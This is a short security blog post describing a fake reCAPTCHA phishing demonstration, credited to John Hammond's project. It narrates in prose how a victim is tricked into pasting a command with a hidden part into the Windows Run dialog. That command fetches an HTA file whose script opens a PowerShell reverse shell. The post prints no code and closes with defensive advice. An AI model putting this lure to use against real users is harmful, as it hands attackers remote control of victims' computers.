logo
Published on

Fake reCAPTCHA - Reverse Shell

Authors
  • avatar
    Name
    Mario Ritter
    Twitter

About this project

The entire project, created by the great John Hammond, can be found here: https://github.com/JohnHammond/recaptcha-phish.

This project demonstrates an attack using a fake reCAPTCHA, which deceptively leads the user to execute malicious code.

What is HTA?

HTA (HTML Application) is a type of application that uses HTML and scripting languages like VBScript or JScript. HTA files have the .hta extension and can be run directly on Windows as native applications. Unlike regular HTML code, HTA applications don't have the same security restrictions as web applications—they can perform local operations such as launching programs or modifying system files.

This makes them a dangerous tool in the hands of attackers who can exploit user vulnerabilities to execute malicious code, such as a reverse shell.

The Attack

I modified a VBA script in the HTA file to provide a reverse shell through PowerShell. The HTA file is downloaded and executed from an external source, allowing the attacker to gain access to the victim's system.

Video

Video Description

The user (victim) visits a phishing website simulating a reCAPTCHA. Once they check the box, they are prompted to open the Run dialog (Win + R) and enter a pre-prepared command. This command initially appears harmless but contains a hidden part that isn't visible when copying. When the victim enters and runs the command, the hidden part is triggered, activating the HTA file from an external link. Once the HTA file is executed, the VBA script containing the reverse shell via PowerShell is activated, allowing the attacker to gain remote access to the victim's computer.

How to defend

  • Never run commands from external, untrusted websites: Any command from an unknown or suspicious source can contain hidden malicious code.

  • Disable macros and HTA in your system: Disabling macro scripts in applications and restricting the execution of HTA files minimizes the risk of running malicious code.

  • Use up-to-date antivirus software and security tools: These tools often block attempts to run dangerous HTA or scripts.

kawaii
       /\_/\
      ( o.o )
       > ^ <

Due to lack of time translated via DeeplAI. sooooory :((

SHARE